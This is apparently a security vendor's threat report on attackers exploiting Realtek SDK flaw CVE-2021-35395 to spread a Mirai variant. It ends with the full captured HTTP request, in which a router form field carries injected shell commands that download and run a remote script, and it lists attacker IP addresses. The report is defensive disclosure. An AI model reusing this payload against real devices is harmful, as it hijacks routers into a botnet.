On August 16th, three days ago, multiple vulnerabilities in a software SDK distributed as part of Realtek chipsets were disclosed by IoT Inspector Research Lab . The vulnerabilities allow attackers to fully compromise and take control of affected devices. Just yesterday, only two days after the publication, our home security solution, Secure Home, detected attempts to exploit these vulnerabilities to spread a variant of a Mirai malware.
One of the vulnerabilities disclosed, CVE-2021-35395 , affects the web interface that is part of the SDK, and is a collection of 6 different vulnerabilities. As of August 18th, we have identified attempts to exploit CVE-2021-35395 in the wild.
Specifically, we noticed exploit attempts to “formWsc” and “formSysCmd” web pages. The exploit attempts to deploy a Mirai variant detected in March by Palo Alto Networks . Mirai is a notorious IoT and router malware circulating in various forms for the last 5 years. It was originally used to shut down large swaths of the internet but has since evolved into many variants for different purposes .
Same attacker – different incidents
A similar incident was reported two weeks ago, on August 6th, by Juniper Networks . A newly discovered vulnerability was then exploited in the wild only 2 days after publication to spread the same Mirai variant.
The webserver serving the Mirai botnet uses the same network subnet, indicating that the same attacker is involved in both incidents.
This chain of events shows that hackers are actively looking for command injection vulnerabilities and use them to propagate widely used malware quickly. These kinds of vulnerabilities are easy to exploit and can be integrated quickly into existing hacking frameworks that attackers employ, well before devices are patched and security vendors can react.
SAM’s security research group tracks published exploits and quickly blocks them using IoT virtual patching (read our recent article to learn more). The above vulnerabilities were blocked within a day of publication, protecting any potentially vulnerable device.
According to the original research, the vulnerable Realtek SDK is used by more than 65 vendors on more than 200 devices. According to SAM’s own research of connected devices, based on anonymously collected network data spanning more than 2M home and business networks, the following devices are the most common devices with the Realtek SDK:
- Netis E1+ extender
- Edimax N150 and N300 Wi-Fi router
- Repotec RP-WR5444 router
These devices are used mainly to enhance Wi-Fi reception.
Full Attack Details
The attack originated from 31.210.20[.]100. However, we believe that attacker’s IP addresses will change over time.
The full attack payload:
POST /goform/formWsc HTTP/1.1
submit-url=%2Fwlwps.asp&resetUnCfg=0&peerPin=12345678;cd /tmp; wget http://184.108.40.206/lolol.sh; curl -O http://220.127.116.11/lolol.sh; chmod 777 lolol.sh; sh lolol.sh;&setPIN=Start+PIN&configVxd=off&resetRptUnCfg=0&peerRptPin=
IP addresses – 31.210.20[.]100, 212.192.241[.]87